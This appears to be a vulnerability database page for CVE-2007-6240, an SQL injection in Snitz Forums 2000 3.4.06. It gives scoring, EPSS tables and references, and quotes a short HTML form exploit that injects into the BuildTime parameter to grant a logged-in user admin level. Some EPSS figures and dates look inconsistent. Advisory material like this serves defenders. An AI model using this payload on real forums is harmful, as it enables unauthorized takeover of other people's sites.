CVE-2007-6240

CVE Descriptions

SQL injection vulnerability in active.asp in Snitz Forums 2000 3.4.06 allows remote attackers to execute arbitrary SQL commands via the BuildTime parameter.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	0.99%	–	–
2022-03-13	–	–	0.99%	–	–
2022-04-03	–	–	0.99%	–	–
2022-05-29	–	–	0.99%	–	–
2022-08-14	–	–	0.99%	–	–
2022-11-13	–	–	0.99%	–	–
2022-11-20	–	–	0.99%	–	–
2022-11-27	–	–	0.99%	–	–
2023-03-05	–	–	0.99%	–	–
2023-03-12	–	–	–	0.07%	–
2023-11-05	–	–	–	0.07%	–
2023-12-03	–	–	–	0.07%	–
2024-02-11	–	–	–	0.07%	–
2024-02-25	–	–	–	0.07%	–
2024-06-02	–	–	–	0.08%	–
2024-06-16	–	–	–	0.1%	–
2024-07-28	–	–	–	0.09%	–
2024-09-01	–	–	–	0.15%	–
2024-10-13	–	–	–	0.18%	–
2024-11-17	–	–	–	0.19%	–
2024-12-08	–	–	–	0.19%	–
2024-12-22	–	–	–	0.22%	–
2025-03-02	–	–	–	0.22%	–
2025-03-16	–	–	–	0.2%	–
2025-01-19	–	–	–	0.22%	–
2025-03-09	–	–	–	0.22%	–
2025-03-18	–	–	–	–	0.45%
2025-03-30	–	–	–	–	0.45%
2025-04-15	–	–	–	–	0.45%
2025-05-01	–	–	–	–	0.45%
2025-05-05	–	–	–	–	0.45%
2025-05-09	–	–	–	–	0.45%
2025-05-11	–	–	–	–	0.45%
2025-05-11	–	–	–	–	0.45,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	18%
2022-03-13	19%
2022-04-03	34%
2022-05-29	35%
2022-08-14	36%
2022-11-13	37%
2022-11-20	36%
2022-11-27	37%
2023-03-05	38%
2023-03-12	3%
2023-11-05	31%
2023-12-03	3%
2024-02-11	29%
2024-02-25	3%
2024-06-02	34%
2024-06-16	41%
2024-07-28	38%
2024-09-01	51%
2024-10-13	56%
2024-11-17	57%
2024-12-08	58%
2024-12-22	6%
2025-03-02	61%
2025-03-16	58%
2025-01-19	6%
2025-03-09	61%
2025-03-18	62%
2025-03-30	61%
2025-04-15	62%
2025-05-01	63%
2025-05-05	62%
2025-05-09	63%
2025-05-11	62%
2025-05-11	62%

Exploit information

Exploit Database EDB-ID : 4687

Publication date : 2007-12-02 23h00 +00:00
Author : BugReport.IR
EDB Verified : Yes

########################## WwW.BugReport.IR ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: A user can gain admin level in snitz 2000 by SQL Injection # vendor: http://forum.snitz.com/ # Googling: "Powered by Snitz" > 2,440,000 victims # Last bug report in 2007-02-16 with 4692 visitors # Exploit: Available # Fix Available: Update to last version. ######################## Bug Description ########################### A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in "Active.asp" After login to your VICTIM forum, execute below script ~~~~~~~~~~~Start HTML Exploit~~~~~~~~~ <form action="http://[VICTIM URL]/active.asp" method="post"> Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br /> DefaultValues: <input type="text" name="AllRead" value="Y" /><br /> Submit: <input type="submit" name="submit" value="Submit" /><br /> </form> ~~~~~~~~~~~End HTML Exploit~~~~~~~~~ ##################################################################### # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Contact: admin@bugreport.ir # Credit: Soroush Dalili found this bug. ##################################################################### # milw0rm.com [2007-12-03]

Products Mentioned

Configuraton 0

Snitz_communications>>Snitz_forums_2000 >> Version 3.4.06

Snitz_communications>>Snitz_forums_2000 >> Version 3.4.06 (Open CPE detail)

References

http://osvdb.org/39002
Tags : vdb-entry, x_refsource_OSVDB

http://www.securityfocus.com/archive/1/484541/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://secunia.com/advisories/27911
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.securityfocus.com/bid/26688
Tags : vdb-entry, x_refsource_BID

https://www.exploit-db.com/exploits/4687
Tags : exploit, x_refsource_EXPLOIT-DB

CVE-2007-6240 : Detail